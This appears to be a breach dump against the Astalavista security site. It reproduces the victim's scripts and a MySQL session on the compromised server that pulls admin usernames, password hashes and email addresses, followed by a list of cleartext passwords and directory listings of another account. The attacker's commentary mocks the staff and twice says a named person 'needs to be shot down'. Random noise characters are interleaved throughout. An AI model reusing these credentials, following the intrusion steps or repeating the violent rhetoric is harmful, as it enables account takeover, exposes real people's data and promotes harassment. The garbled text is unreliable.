, m$ }7 d: _" ?7 l4 {8 T <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>1 q$ {! ^2 u1 f4 E0 e/ ^6 f9 h' H
<docs>http://blogs.law.harvard.edu/tech/rss</docs>! Z6 K/ I; V* D4 D
<generator>Astalavista.com</generator>
# l, j9 F6 m" h' G <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
2 A* ?+ g( F. F. P </channel>
% L* Z' ~- ~9 F</rss>’;
* d, Q, J7 m! Q0 y+ `7 k0 N7 Z
4 J1 \7 Q! w% `4 g9 \7 p if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {7 h* N! Y4 g3 h' B6 D+ Q& J( V/ Y/ q
unlink (FULLPATH . ‘/feed/exploits.xml’);: I1 G# J' H. A: j) k% O
} g) b# j6 ^- g& `' ?8 {
* F+ N3 a( m! w0 l6 F file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
; d$ S. Z6 M/ [6 \[snip]
) u \) I4 d0 F; ~# J
$ n: b/ T0 P0 Bsh-3.2$ cat exploits.sh
j/ P8 T0 q; g1 b/ O4 n/ h6 W1 J#!/bin/sh& G1 B5 W4 ]5 C/ K: J) u% O5 t
6 _$ e! N* X, @5 P6 z/ R###########################################################
! u( a7 Z1 h4 j- \# n! @# #( m% _# R4 W0 u6 n; A" t
# Title: milw0rm exploits adder #' c( h! A6 R. o* n, Q& _
# Description: Add all milw0rm exploits to the #
( G1 J0 V7 q4 z, H0 U! [# Astalavista.com database #
* O* y6 u: m% `# #
! e' ~/ i A, H# Company: Astalavista Group #1 y: E7 p* r# J$ Y) W# V3 w
# Author: Paulo M. Santos #" r; ^2 v% l. |
# E-Mail: 链接标记paulo.santos@astalavista.ch #
& P! |5 A, B9 I* D' d4 _# #
7 f# Z8 O% o' O/ x2 G###########################################################" I* K4 u5 P- k4 g: m
8 _4 l2 W- S' g* l& B
# path
6 D+ p4 d3 c5 M& Dthis_path=/home/com/public_html/modifications/cronjobs/ Q1 A5 T% L) e5 [# H# v
- \3 C+ Q; Q; Q# D) |4 Y; Z
# change directory5 T2 _$ g. a& I) k
cd $this_path) M: @6 l( Y* a- Y; F( Y$ m4 U
cd tmp/) x- r3 W9 e% V3 ~* J7 H
- }/ O- F- R/ \# P2 }/ ^
# delete files
# R3 e3 i: Q! S1 \2 v; frm -rf milw0rm.tar.* &% c- j# K1 V5 Z# H# L7 F
rm -rf milw0rm/ &$ E. K7 o# R" G1 m/ |' ~5 _
$ A: x" D- s' q0 i, M# wget milw0rm paket
9 R6 `3 d) t# c4 w' J: |wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
, U- ^ G3 P5 b; c' ?+ F7 H
* K C( n" ~( h! D) H5 X0 w6 }7 I8 ]# extract milw0rm paket( L/ D$ {0 Y- q# I4 m/ `
tar -xvf milw0rm.tar.bz2
# J5 K& w- O, R# d3 }6 Y& N) C1 x- |* c3 Q- J. r
# change owner
- Y' N% D5 L$ ] n6 I- {- Gchown -R com .# s" s2 H+ |- k
chgrp -R com .
' Q; s% U3 l9 I! G/ |) \' ?# p; a. e |7 x. @- Q
# execute php script& z" j& G3 U2 _; H) l n
cd $this_path
( ], ?- L, w1 h" F7 X7 Pphp -q exploits.php3 ^; M6 l$ h. L" L( `
: M& E% Q! E( J# e* r: x# delete files3 }4 a7 p2 O8 y8 N8 ?; j
rm -rf tmp/milw0rm.tar.*
/ F5 z) Z) T9 h) [; zrm -rf tmp/milw0rm/) q+ e* S3 C" Z# d# H+ w% [
" Z/ @# r- |+ W( R
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
4 `" h8 ]2 K) I# o* c9 ?6 w4 mPaulo M. Santos needs to be shot down.3 ?- U1 Z o, `! w# p3 e; l
& p" t; X2 N wmysql -u contrexxuser2 -p2 C4 u, {2 J4 R5 c4 R
Enter password:
% h3 c! F# m& V7 K& {Welcome to the MySQL monitor. Commands end with ; or \g. _/ A+ s( t* r; H7 c: j3 d# n& ?) C
Your MySQL connection id is 261694
/ ? F0 p; c% X6 [% l/ RServer version: 5.0.45-community-log MySQL Community Edition (GPL)
+ v' D, N `. k7 U8 r9 J3 v( B, F ]: n8 o9 X( d; P, f
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
# [4 F8 S, o, F' T+ P2 D5 m9 E- p
+ E6 h2 m. G) N. J* z8 @! r1 t) Bmysql> show databases;
4 x, n+ D- x G% D2 X& O+——————–+
1 K/ R( T; ?" W: T; p| Database |% V N& B8 O: R; _5 G) u
+——————–+
; F/ R0 q7 j% n e' G| information_schema |
+ o/ M/ j$ Y: N! a/ h" z| com_contrexx2 |+ G7 }5 {7 j. F
| com_contrexx2_live |
9 x# v# m/ M$ [& l i( V& Q2 H| test |
! O F7 S) \! z+——————–+5 i* k) J2 U4 `/ k H+ T1 `
4 rows in set (0.00 sec)$ v# o" ?9 v( h6 Y) E! r: D) n& x
. T2 a; _' r' P3 @9 {7 f0 _8 I' fmysql> use com_contrexx2_live
* r& ]! Y/ G" M C; b, Y. QDatabase changed: k( c x0 M. M P4 c
mysql> show tables;' ]$ k& ^. s3 v& d
+————————————————–+" \, u1 U" T# o, u6 t# `
| Tables_in_com_contrexx2_live |
, v/ [" z E: l+————————————————–+
, Q. V) T! n9 T# A. Y| cc_banner_counter |
, U* |, [& c- _+ `| cc_search_counter |, L* u: |+ q2 ^$ c7 J% {
| contrexx_access_group_dynamic_ids |
; C6 }. d C# e8 L, Q4 j| contrexx_access_group_static_ids |
* _3 L, ]& P0 E9 v| contrexx_access_rel_user_group |/ L% f2 Q8 m- N B2 Z
| contrexx_access_settings |0 N7 w8 m/ K! `( T
| contrexx_access_user_attribute |* x) B1 k& N3 W" D- ~& M
| contrexx_access_user_attribute_name |
& u9 E$ T2 c: m8 ]' u! Z| contrexx_access_user_attribute_value |+ N. N8 h/ Q O
| contrexx_access_user_core_attribute |
4 s3 @% v3 E' I1 d0 O- T- Y| contrexx_access_user_groups |
2 r/ S7 }9 J/ L' a* @- K( O| contrexx_access_user_mail |
k( l/ F/ v4 d9 R0 G4 z2 w o| contrexx_access_user_profile |, p' G9 V0 {! l4 x% d% Q2 `
| contrexx_access_user_title |
/ W- \' n9 G, V2 `& a' B, M3 ^| contrexx_access_user_validity |" v9 B6 }" Y( e$ ^0 @" G p1 O* q
| contrexx_access_users |6 m$ X, h; K: L K; a/ w# ?" j/ ]7 P8 I
| contrexx_backend_areas |
) |* A# r8 T, J, |- F# {( k0 c) }| contrexx_backups |
7 \# y5 S- `, q% Z- ~/ N/ ~| contrexx_content |1 ]+ A+ \3 b) `7 n/ i
| contrexx_content_history |/ ?) f# Z4 M9 V! b& U
| contrexx_content_logfile |- Y9 t8 Q% \+ |* i9 T$ N
| contrexx_content_navigation |
7 D( _( L) m# m" |" y7 Y$ V9 W| contrexx_content_navigation_history |2 u" X* }4 W2 t8 c% W1 a$ R5 [
| contrexx_ids |
3 E5 q8 V9 X) Z8 R, Q| contrexx_languages | O1 ?$ }, w' r a1 C; J# V# e
| contrexx_lib_country |) k! H* T+ I6 d/ x; d
| contrexx_log |6 {$ T& e* m. F( c2 G2 p* n, N
| contrexx_module_alias_source |% s5 x7 s, y5 g0 m
| contrexx_module_alias_target |. [0 Q w/ O8 V6 o+ B
| contrexx_module_block_blocks |
9 O/ C3 Z: S/ D1 [| contrexx_module_block_rel_lang |: v$ K4 B! v. G* {0 r1 U$ I2 U( |3 \
| contrexx_module_block_rel_pages |
* [* ]- C. R; b6 B2 ]/ || contrexx_module_block_settings |
4 H) N5 [* I6 J2 G, H3 i- F| contrexx_module_blog_categories |
. r7 d. Y5 U# @* \3 U| contrexx_module_blog_comments |, Y' q5 D( @7 E
| contrexx_module_blog_message_to_category |4 a" @* e0 N" F4 X8 C
| contrexx_module_blog_messages |
$ D% x. s" Z2 M4 @% x/ s+ {) I' ~| contrexx_module_blog_messages_lang |$ Y4 U* F4 Y$ N. Z" L3 c- b9 O
| contrexx_module_blog_networks |) e0 |/ ^0 \: h: F3 O" u
| contrexx_module_blog_networks_lang |
0 s1 A, \6 f6 e8 \$ `6 m| contrexx_module_blog_settings |& Q" o' V v0 o7 A
| contrexx_module_blog_votes |
2 j2 \& b2 c% [" k: G| contrexx_module_calendar |
% `% [. q3 G9 | c/ || contrexx_module_calendar_access |
3 q8 J8 u: q Q, W) i3 A5 m| contrexx_module_calendar_categories |# y+ v! I6 F0 r4 A
| contrexx_module_calendar_form_data | c# V! f8 e$ L6 b( X" z c
| contrexx_module_calendar_form_fields |
: \7 n6 z# F3 u" S6 c, x; k, a| contrexx_module_calendar_registrations |* P" d3 n7 L: [2 _5 [, v
| contrexx_module_calendar_settings |
' D% x' F- l7 {9 t6 T+ N| contrexx_module_calendar_style |
. M; S. L2 x7 X3 T' D# |2 A& m2 L( e| contrexx_module_contact_form |# m: b+ C; L0 a, F
| contrexx_module_contact_form_data |4 s$ f9 f* e9 j# o$ m: |
| contrexx_module_contact_form_field |
) e' V% [' ?! G* z- h| contrexx_module_contact_settings |8 w& O% B; u: l6 I1 s
| contrexx_module_data_categories |
8 h9 ?) \8 B& L3 T" B4 j| contrexx_module_data_message_to_category |
7 w, E' u8 \! W/ b| contrexx_module_data_messages |2 R0 H5 D& k. M! U2 V' @
| contrexx_module_data_messages_lang |; S9 u @# ]( J! l/ l) F, j$ ]* Z
| contrexx_module_data_placeholders |
9 C, A" x h; [" O9 G5 R& ~| contrexx_module_data_settings |* r M$ {* {1 |. M
| contrexx_module_directory_access |
# q/ _. V7 m. s) K7 p; i| contrexx_module_directory_categories |
3 F5 V: ?+ x+ B3 m7 K| contrexx_module_directory_dir |$ W) k' p6 Y8 n+ R9 E# m
| contrexx_module_directory_inputfields |
; ~+ U1 k2 }) H1 E0 I| contrexx_module_directory_levels |
$ T0 T' d- F" O- U7 Q| contrexx_module_directory_mail |
4 e" T& s. T4 Y P& V8 X! ` k| contrexx_module_directory_rel_dir_cat |
" [, L8 m+ l$ w V# C7 L! N+ d| contrexx_module_directory_rel_dir_level |; ]8 n1 x4 y7 `% y9 v3 I; D
| contrexx_module_directory_settings | f6 ?% J) c$ [0 n% z
| contrexx_module_directory_settings_google |
" X# m5 H9 D0 A# k& M6 A| contrexx_module_directory_vote |
% O+ j& X, M h/ `7 C| contrexx_module_docsys |
1 v( g8 ^, v1 m( v$ N| contrexx_module_docsys_categories |
* P& g# J8 C( f1 K2 T3 v| contrexx_module_egov_configuration |
$ G$ y9 G1 d% M/ q| contrexx_module_egov_orders |
: w2 H! n% n2 O& y| contrexx_module_egov_product_calendar |4 V) W8 F8 \: c% V" ~. b
| contrexx_module_egov_product_fields |6 c# K# d$ R7 T, }8 c& J* I
| contrexx_module_egov_products |( x) d! \/ o; }. T* b- g& a
| contrexx_module_egov_settings |
: k% L- U- |: v& [| contrexx_module_exploits |- d) C/ O, R) K: j4 P
| contrexx_module_exploits_categories |
2 l+ Q6 u1 u7 [| contrexx_module_feed_category |% t$ b$ ]3 w8 K- @ x) O
| contrexx_module_feed_news |
9 s+ G3 X! S& e: K| contrexx_module_feed_newsml_association |
3 i4 K2 l H2 j% x| contrexx_module_feed_newsml_categories |
2 n" Z' L' v: S9 W3 Q3 W& D; C| contrexx_module_feed_newsml_documents |
$ } s, g" w9 c4 m" v+ s| contrexx_module_feed_newsml_providers |. m: p8 p5 S, ?) p& {
| contrexx_module_forum_access |% ^6 O) ~3 |9 ]- k
| contrexx_module_forum_categories |/ h& M' P: H* z% m3 a
| contrexx_module_forum_categories_lang |
( x( N7 G- |5 I: S! ?| contrexx_module_forum_notification |
6 \9 T! ?) f! O! u| contrexx_module_forum_postings |
) N6 X3 Q: O+ U9 H' H7 N, R* U. _! P| contrexx_module_forum_rating |
5 ?" U) T1 j* o( V1 A# ?, t| contrexx_module_forum_settings |7 k1 p0 {" _# C0 z
| contrexx_module_forum_statistics |
5 t' X9 X' K: @- g0 V| contrexx_module_gallery_categories |
' S9 l* U& _5 i3 }| contrexx_module_gallery_comments |3 G# D" c0 H% ]# Z* E- s2 T! S6 ?7 M2 m
| contrexx_module_gallery_language |
, q& B) H; j( B' p4 ]. j| contrexx_module_gallery_language_pics |
$ l, _; n- M/ g; h; B| contrexx_module_gallery_pictures |
! I+ N Q3 E7 b! U& S: k) _| contrexx_module_gallery_settings |
' M4 S, k2 {$ S7 V| contrexx_module_gallery_votes |
/ k- B# @* [4 Q$ \: c+ K| contrexx_module_guestbook |3 w" y r2 Z4 Z1 h) l$ p
| contrexx_module_guestbook_settings |
. N; u7 W: ]; v, h0 g| contrexx_module_livecam |
" ]9 X: ^/ H) k) @' T7 n1 `| contrexx_module_livecam_settings |- z& Y m# x! U- M& s x# W5 i4 n
| contrexx_module_market |! g F+ ?6 a5 H( a u
| contrexx_module_market_access |$ b) ]" b4 B1 R9 O1 B3 T( o
| contrexx_module_market_categories |
. c2 X) N, R9 @% c4 \| contrexx_module_market_mail |
+ j: o k+ T7 P3 f| contrexx_module_market_paypal |
8 t, [8 A4 {: @/ Q1 l1 z| contrexx_module_market_settings |/ p& Z' x8 q+ s1 M+ O' D9 t% [, T
| contrexx_module_market_spez_fields |3 o) O- R9 c. o/ |9 |2 k: m( q
| contrexx_module_mediadir_access |0 S$ P: W0 g, S- R4 C
| contrexx_module_mediadir_categories |
) Y, e* z2 E# m# \& Q1 a) n| contrexx_module_mediadir_comments |/ {# s3 r: a& E9 ?- Q
| contrexx_module_mediadir_dir |
3 {3 B3 S: R: G| contrexx_module_mediadir_inputfields |
r3 A" v8 R% o" r# m, |2 n j| contrexx_module_mediadir_levels |
7 x& K; J2 C. d| contrexx_module_mediadir_mail |/ _ p7 G5 \+ P) \5 @
| contrexx_module_mediadir_rel_dir_cat |$ N; u( L! R( ` \& z! @
| contrexx_module_mediadir_rel_dir_level |% U- f- M# f% k( Y
| contrexx_module_mediadir_reports |
$ ?9 @3 B4 ]2 J' t1 O n! g| contrexx_module_mediadir_settings |
, z/ U9 V+ L& M- j5 p| contrexx_module_mediadir_settings_google |
1 b0 n! f D% D% f. i* T+ V| contrexx_module_mediadir_vote |
, ?. z5 F3 f2 W! v0 H+ ~% w3 p4 N| contrexx_module_memberdir_directories |
0 s- ~" _1 `2 V% b8 t| contrexx_module_memberdir_name |7 C0 e$ N7 e6 H/ h; A' V
| contrexx_module_memberdir_settings |
& f0 r! U( w7 Z- [9 _5 e5 ?| contrexx_module_memberdir_values |
5 ~! t/ i& K; G" t. ?. E( {, u| contrexx_module_nettools_allowed_groups |
) K0 h0 z3 F5 y| contrexx_module_nettools_settings |
: i' }" q- f, N6 I' f& E- i$ G| contrexx_module_news |& n" B1 u1 S5 w. E: g. h" w6 _
| contrexx_module_news_access |0 \! h5 {* x) d) d8 t
| contrexx_module_news_categories |
1 q* u7 l: [' {' Y" }- T| contrexx_module_news_settings |
+ E; M5 _1 H3 Q/ T+ R| contrexx_module_news_teaser_frame |
% A8 q) J3 T6 ~& u% \* o' d| contrexx_module_news_teaser_frame_templates |
1 X, B1 m4 p E6 |+ _/ t| contrexx_module_news_ticker |
' x9 B7 L9 L7 a# c. Q+ p| contrexx_module_newsletter |
0 m7 o i" }) q5 z( D| contrexx_module_newsletter_attachment |& P8 z+ e9 \9 U. X& [4 `9 G* M8 N& H
| contrexx_module_newsletter_category |! N) R' e9 B7 t
| contrexx_module_newsletter_confirm_mail |
; h" L2 F' x) _3 G6 {7 x5 a| contrexx_module_newsletter_rel_cat_news |# y; A A$ [& I( @2 [, _
| contrexx_module_newsletter_rel_user_cat |
% b; f, t6 w" o: ?| contrexx_module_newsletter_settings |
5 {' Q2 \3 `: ~! k; F1 `- L| contrexx_module_newsletter_template |
# i9 O4 e6 I0 h3 \| contrexx_module_newsletter_tmp_sending |
3 g: O* p9 s' u, r) z| contrexx_module_newsletter_user |
& A! A" H! ~$ s" {: E: c4 \" s9 p| contrexx_module_newsletter_user_title |0 C0 [2 x9 S/ r* V- |5 H; L; C& @
| contrexx_module_onlinetools_defaultports |# c7 q9 u5 [# ^
| contrexx_module_onlinetools_defaultports_back |
X, w9 n: F D' T0 i| contrexx_module_onlinetools_geolitecity_blocks |5 }; a% B0 X( V; a/ k) X J0 r
| contrexx_module_onlinetools_geolitecity_country |' N) T/ m' S7 w- h( U; E
| contrexx_module_onlinetools_geolitecity_location |7 F( W; q- O1 G
| contrexx_module_podcast_category |* _* J& Z6 O- l* G+ I
| contrexx_module_podcast_medium |; b% Q* m$ X: a! E7 L* \% n! J: x
| contrexx_module_podcast_rel_category_lang |
2 K: q7 E9 X! L) ~| contrexx_module_podcast_rel_medium_category |; S+ v! {, H& N5 ?
| contrexx_module_podcast_settings |" Z. j. q9 W u" V4 R0 w
| contrexx_module_podcast_template |
! t. C& Z# N. {. h+ U3 M! S| contrexx_module_proxydb |3 F# D, y" M9 |7 y
| contrexx_module_recommend |9 g* z; i7 a- d& C8 q/ F9 A
| contrexx_module_repository |9 G8 o8 [3 @" S
| contrexx_module_securitynews_cats |9 Q( q! L$ x- \3 z, F
| contrexx_module_securitynews_feeds |* `4 u0 Q( [- @5 E1 e9 Z4 |+ b
| contrexx_module_securitynews_news |
0 }* ~+ [& F: ~: }' B2 ^| contrexx_module_shop_categories | G- }% h2 z0 O2 A b- ~
| contrexx_module_shop_config |
9 F' R4 E1 G0 w| contrexx_module_shop_countries |: K$ u. b, g2 T. U! @
| contrexx_module_shop_currencies |
! |8 d) N$ D: W: X k, A| contrexx_module_shop_customers |
3 b2 ~/ F! l3 z5 A* Y. J| contrexx_module_shop_importimg |
7 ?( k% F$ j5 g5 Y# I| contrexx_module_shop_lsv |0 n& Q' n' V& n9 E& F1 W
| contrexx_module_shop_mail |
8 m8 R C& s2 z: j# [1 f) ~- ^| contrexx_module_shop_mail_content |
. s- Z. V# Y. g" @| contrexx_module_shop_manufacturer |( V/ F/ G7 B$ Y9 M
| contrexx_module_shop_order_items |/ I+ {, U+ B; ~+ ]% A) G
| contrexx_module_shop_order_items_attributes |! t! F6 t: [: L {
| contrexx_module_shop_orders |
& [* n* G# B, I/ P6 L+ A1 A* I| contrexx_module_shop_payment |
/ E0 G; `8 A5 O8 {/ K| contrexx_module_shop_payment_processors |
+ _1 T) `0 P: l+ w4 g9 {| contrexx_module_shop_pricelists |1 J, V! |$ w/ t6 g/ w' @8 |
| contrexx_module_shop_products |
# W# H( D) S! e$ l| contrexx_module_shop_products_attributes |
" O9 p* g% Q4 l* }| contrexx_module_shop_products_attributes_name |
$ \8 c$ m, D# F- {3 @| contrexx_module_shop_products_attributes_value |
3 e @9 h8 G6 i) T3 f9 E| contrexx_module_shop_products_downloads |; N4 n- W1 M# k2 h$ A
| contrexx_module_shop_rel_countries |8 @1 t1 V5 T" M+ C1 M% Y, a2 y
| contrexx_module_shop_rel_payment |
; W& T, ]( V5 d8 k| contrexx_module_shop_rel_shipment |. o9 _" i& T/ b7 G: Q g) F0 M
| contrexx_module_shop_shipment_cost |
5 }6 n; j. F8 \; k) g( b$ u| contrexx_module_shop_shipper |* R. a; s$ V/ T7 F
| contrexx_module_shop_vat |
1 @. @" Z% I& l8 E. j| contrexx_module_shop_zones |
% \6 [" ]6 N7 U( F3 x. ]; F- G1 c| contrexx_module_u2u_address_list |
% R, k" M4 R+ X+ Z5 @. N| contrexx_module_u2u_message_log |
% S# ^) [( i2 ~0 {, `| contrexx_module_u2u_sent_messages |2 z) e; w; `' R" y
| contrexx_module_u2u_settings |
! o, c0 V) Z4 g% P| contrexx_module_u2u_user_log |/ E" r" x1 W6 i9 L
| contrexx_modules |
m9 ^: W4 V5 P| contrexx_sessions |
9 F9 W& S5 h$ [8 r9 U q| contrexx_settings |6 q8 b- E, d4 I& `
| contrexx_settings_smtp |
4 r$ }5 q# ~+ m6 {+ x0 k1 O/ e( w" q| contrexx_skins |
4 @) K. W) |; C$ z* x4 h! {| contrexx_stats_browser |
w. E8 a3 P$ T* r w, o. E2 K" c- `4 u| contrexx_stats_colourdepth |" @! B+ l5 d. V
| contrexx_stats_config |
3 H4 ~$ Y/ [2 V| contrexx_stats_country |
( ~" e+ }- ?/ n) k4 d+ n7 f| contrexx_stats_hostname | Y+ f/ |- I) C! ]4 q' v
| contrexx_stats_javascript |) a. a# G1 [9 w0 S+ i/ O8 Q
| contrexx_stats_operatingsystem |
! l+ c; R6 k: u* m| contrexx_stats_referer |# j. z1 p, x4 v0 D: g \# K& k
| contrexx_stats_requests |4 E; ?- w+ C9 v/ U. d E
| contrexx_stats_requests_summary |. l( m. U/ {7 L3 P; Z
| contrexx_stats_screenresolution |' x$ G9 ?1 X, W3 E
| contrexx_stats_search |3 Q8 C+ e \' s/ X
| contrexx_stats_spiders |& M$ D( P2 `9 N& f6 b
| contrexx_stats_spiders_summary |
( X$ X9 B- y1 a* `| contrexx_stats_visitors |1 Q$ z8 z/ L3 e* {$ p' h) V
| contrexx_stats_visitors_summary |
7 N3 Y6 J, l' [( L" ~# X| contrexx_voting_additionaldata |( b9 W( j* F8 S4 L
| contrexx_voting_email |
2 ~5 O+ X: ^/ G8 U4 C) [| contrexx_voting_rel_email_system |
7 b( U. u/ K7 {/ F| contrexx_voting_results |
/ X/ } B/ T% k! X# y( Y, H| contrexx_voting_system |) z+ Q1 _0 B4 `8 k5 Q6 o- u
| foo |
$ ] D- G6 x5 v( | d+————————————————–+
% Y6 A9 B1 S+ u2 K' U8 t227 rows in set (0.01 sec)
4 \0 h4 R8 G/ F; z7 P. U- p; b
; ~3 t; `2 ~& X2 o6 [mysql> select count(*) as skids from contrexx_access_users;" i( U$ ~: R) `
+——-+
' v% Q3 n2 R8 ]! J# L| skids |# z4 D5 l5 C; e; O8 U/ W/ ~
+——-+8 {$ k% s% B; F1 x3 e
| 53699 | G( C( J; u2 L: l
+——-+! [- }! h' o: Y" M0 m
1 row in set (0.00 sec)& r+ @( ], l6 M0 Z6 j* q
. y1 ?. H1 `7 @$ ? w+ Amysql> describe contrexx_access_users;
$ n. W0 Q' r, }) @" \2 ~+——————+——————————————+——+—–+————–+—————-+3 H# Y/ V; y- d& G1 _2 t7 B, Q
| Field | Type | Null | Key | Default | Extra |
6 \& T& M C9 _! F: E/ ?+——————+——————————————+——+—–+————–+—————-+
" Q! R# W% U2 u8 L| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
8 O. h; L- l+ {" P# y2 Q| is_admin | tinyint(1) unsigned | NO | | 0 | |. U! e" u$ ?, c, X* `' W; n
| username | varchar(40) | YES | MUL | NULL | |: t5 V( j- E- H% }, F! I. S
| password | varchar(32) | YES | | NULL | |0 t3 }, j2 i, h% N" e! h( f6 j
| regdate | int(14) unsigned | NO | | 0 | |
- i( C9 a6 Y. Z: ?5 E' E; C4 U| expiration | int(14) unsigned | NO | | 0 | |
, _. j+ G( u" Q7 a0 U| validity | int(10) unsigned | NO | | 0 | |
/ k0 ^- u, x. U9 c4 i' f| last_auth | int(14) unsigned | NO | | 0 | |
6 m0 o. S1 k5 W [| last_activity | int(14) unsigned | NO | | 0 | |; `! y5 u9 v% d% T
| email | varchar(255) | YES | | NULL | |
4 ?; y4 n7 J: x- c- ^5 b2 P| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
$ R4 F( V# q3 n| frontend_lang_id | int(2) unsigned | NO | | 0 | |
' J1 Y( c! B& }- N5 K% Y* r1 ~; f% h# k| backend_lang_id | int(2) unsigned | NO | | 0 | |
# A5 S# ]$ T( ]$ W3 k| active | tinyint(1) | NO | | 0 | |
* k: ], Z" ^ u5 @2 a# [1 u| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |% z1 W. H5 b$ O! m& x
| restore_key | varchar(32) | NO | | | |
, u4 w! ?& I; x) N/ L9 `& d0 b| restore_key_time | int(14) unsigned | NO | | 0 | |
% @# q1 N1 i# @) d8 g# l" m| u2u_active | enum(’0′,’1′) | NO | | 1 | |
% Z# {6 Z/ O; ^0 w2 Y+——————+——————————————+——+—–+————–+—————-+
7 I) i, f: N" h. O18 rows in set (0.00 sec)
/ ?" z3 K. D" H7 G% O3 |
- T2 N; }2 n7 `mysql> select username,password,email from contrexx_access_users where is_admin = 1;
9 r7 r4 n0 `& z& x, p+ X% n/ z+————+———————————-+—————————–+
. e4 q1 u; T8 I) b$ T7 A| username | password | email |
6 U* f8 J r9 R+ R4 k% L+————+———————————-+—————————–+
6 Z0 |$ a3 n% `" r+ ^7 y! p| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |9 n1 h/ ]- @) O$ ]! w
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |7 ?; R8 p" @7 ~8 Q, r$ F0 U
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
/ n! J! t u7 |! u7 c) r0 `| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com | _6 w* V% \3 r" y& D
+————+———————————-+—————————–+
$ f, k& _3 j; P6 D) E$ u4 j4 rows in set (0.04 sec)
1 x( w0 F4 C1 Z) q8 B w" _: E# d) n3 d8 F
mysql> exit;/ P8 w2 s i. U/ o0 i& z& z$ U
Bye
1 L; H% i3 ]1 R+ y
& l/ n- g# t: @5 E' ~[~] There you go, your “team of security and IT professionals” is a joke.) X3 D2 p$ e" @9 W
( }. I' R- `( u8 i, G+——————————+6 y/ h* [- H7 e
system:f82BN3+_*
. V* \& H' D3 | |3 |" `! LBe1er0ph0r:belerophor4astacom
& Z) t" h3 \. _1 _# bprozac:asta4cms!3 X8 X- G8 o; _* Y6 D7 t6 d/ h
commander:mpbdaagf6m4 S5 \) F, _; P& y6 Z9 l
sykadul:ak29eral5 N, `" e, G+ Y; Q9 h6 B
+——————————+* a) |' O7 [2 b
; J7 F3 w0 \+ ?2 ^; `7 E& `
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)1 M# e) V. b" [" U+ ]5 p1 T& L" W2 Z
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.* S5 O1 Z: G n+ z4 h; A: G% |
8 r5 u, Z; D+ t" L3 p( X[~] Lets move to astalavista.net now,/ [6 ~( q- I; P$ f9 [
4 a0 L$ Q: y# x% m$ l; RFrom <链接标记[url]https://www.astalavista.net/[/url]>:
6 X0 `" i" A: K0 _/ A>> Everyone knows that the best defense is a good offense.
0 @5 C# f( n* \. O* P>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.+ s6 Z+ r+ H% @6 |
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.- ^/ _, \! A# c1 J, O; e) ~
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
% D) V1 y' d9 l% p1 W, H3 n# {; ^( f1 D( K- j) w1 V
>> Go ahead, try and hack our server . in a completely legal way!
) t1 ` C" O6 q, e( I! h>> Learn by doing: We offer our members tricky tasks and challenges on an
5 k( W8 m! `/ f+ e' M) S8 s>> ongoing basis so you can test your knowledge and abilities. You can also
5 r, ?; o0 r/ d$ h- m, B! d>> demonstrate what you.ve mastered by taking part in regular hacker contests( A- e6 @) C, M6 t- a
>> and war games
' x+ z3 |" {# X5 H* ?* f
( i- n; m4 q3 p6 o[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
9 ^. r' @8 ~. l+ R/ N
# F2 a+ P( _2 v" V+ B[-] Tricky task: Find home dir of astalavista.net6 y; q: e2 A) l% y" \. l
2 Y) O; `. q2 Ksh-3.2$ ls -la ~astanet* o6 ^2 G7 T# h' ~' l0 P
total 48
, {9 E6 H0 p( p& Zdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
, _$ @: Q5 v" v1 T+ P; Jdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
0 o9 {' H0 y. p1 i2 I8 Qdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
& v! U# e, O% P A- p: d; m-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
6 k! o. P' E+ q/ c$ F-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
/ _, V8 Z4 H" V# W-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile; n: a% Z& V. n! L
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc, _4 ]; U& r/ [
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
" B; @* g. f' z# Y; Qdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap, n0 j4 }- b9 m" e! M/ J
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
5 l. Z3 e" m4 k$ Y" B! k# U5 rlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html& Q- q8 w8 p4 T- i/ b$ v
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow j9 K' C4 ^( V* c' \6 I
& Q% D) e, \$ W2 Q' N0 C4 g
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
) s, s3 O# T) }7 z6 o3 J8 tsh-3.2$ ls -la
" h' O2 L" ?- v: ^total 2008 a, P3 l4 q" o- E$ w- f0 C$ h, E( c
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
, n" @8 ]+ V! Q/ G3 y" ?9 w6 T6 m$ i* Gdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..( [) K' R- s9 }: C; V: R
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007* Y7 X: R/ g5 }, p( f! M6 \
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
